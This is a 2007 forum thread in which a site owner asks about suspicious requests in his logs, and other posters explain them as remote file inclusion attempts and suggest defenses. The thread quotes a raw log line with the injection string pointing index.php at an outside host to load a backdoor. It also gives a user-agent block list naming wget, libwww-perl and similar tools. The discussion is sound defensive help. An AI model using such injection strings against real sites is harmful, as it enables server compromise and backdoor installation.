1. Advertising
    y u no do it?

Advertising (learn more)

Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

Starts at just $1 per CPM or $0.10 per CPC.

SQL injection attack - What was he attempting?

Discussion in 'Security' started by sweetfunny, Mar 21, 2007.

Hello,

Last night i caught someone attempting some sort of SQL injection on my cPanel account showing in the latest visitors.

The log shows:

index.php?page=http://www.yenzero.com/c.in??
    Http Code: 406 Date: Mar 22 08:46:21 Http Version: HTTP/1.1 Size in Bytes: 268
    Referer: -
    Agent: libwww-perl/5.805

Just a warning, if you go to the URL appended to the end of the string my firewall is throwing up a php_chaploit.r warning and there's a bunch of junk code on the page.

Anyhow, this attempt was happening at the rate of about a request every 10 seconds.. sometimes only 1 second apart. It was coming from range of IP's from all around the place, like hundreds of different addresses.

So i couldn't ban the IP's but i did ban the IP that yenzero URL is on, and also removed my index.php page. The requests kept happening, so i just changed my nameservers to Domainsite parking page (don't like them anyway)

Can anyone give me any further info on this, and would using mod-rewrite to remove the /index.php?page= from my URL's offer any help?

Can anyone give some more input on this?

Thanks, sweetfunny.

sweetfunny, Mar 21, 2007 IP
  2. rootbinbash

rootbinbash Peon

Best Answers:
    mod_rewrite is useless for this.You should fix your code.

rootbinbash, Mar 22, 2007 IP
  3. sweetfunny

sweetfunny Banned

Best Answers:
    Thanks for your reply.

It didn't appear he got in, as he was only requesting the index.php page over and over again. Or did he actually exploit my code and was using my server for something?

I don't know that my code is even vulnerable, the script did have a vulnerablilty listed on the advisories but i applied the fix for it.

I have no idea, maybe i just point my nameservers back and monitor the logs again. :confused:

sweetfunny, Mar 22, 2007 IP
  4. Estevan

Estevan Peon

Best Answers:
    is a lite kid using a premade tool to look for servers vulnerables , only ban the ip best ban the ip range :)!

Estevan, Mar 24, 2007 IP
  5. ajsa52

ajsa52 Well-Known Member

Best Answers:
    Well, you can ban the "User-Agent" on your .htaccess file
    I'm currenlty banning this User-Agents substrings (among others):
    "Wget"
    "HTTrack"
    "WebCopier"
    "WebSauger"
    "WebReaper"
    "WebStripper"
    "Web Downloader"
    "libwww-perl"
    "Python-urllib"

ajsa52, Mar 24, 2007 IP
    sweetfunny likes this.
  6. sweetfunny

sweetfunny Banned

Best Answers:
    If i done that i would have to ban *.*.*.* because every request was coming from a completely different IP and IP range.

BIG Green rep to you, thankyou.

I knew doing something like this was possible for Wget and site rippers, but didn't think it could be done with the "libwww-perl" that was hitting me.

Your a lifesaver. :)

sweetfunny, Mar 25, 2007 IP
  7. rootbinbash

rootbinbash Peon

Best Answers:
    He was trying to include a remote file.This is your start point.

rootbinbash, Mar 26, 2007 IP
  8. Louis11

Louis11 Active Member

Best Answers:
    As rootbinbash stated, he was trying to perform a remote file include. Google "Remote File Includes" and you should get a ton on information about it.

The file he was trying to access is a backdoor of some sort. When he includes it in your URL he is trying to get your code to execute his code (on your server). This will execute the commands in his file and usually create a new username for him, or allow him access to the server.

Oh, and check to make sure that there are no new files on your server. Specifically in your tmp. I looked at the code and it seems it does a lot of wget's to the tmp directory... so if lots of things start showing up here you might have a problem :)

He's a script kiddie... I wouldn't worry to much, just ban the IP and secure the remote include (if you're vulnerable).

Louis11, Mar 26, 2007 IP
    sweetfunny likes this.
  9. Zinho

Zinho Peon

Best Answers:
    This could be the start of an attack, or a way to make some "noise" in your logs to cover previous actions. I advise you to check your script instead of concentrating on banning the attacker that is quite a unuseful practice since he can use a proxy rotator or a user-agent faker.

Zinho, Apr 9, 2007 IP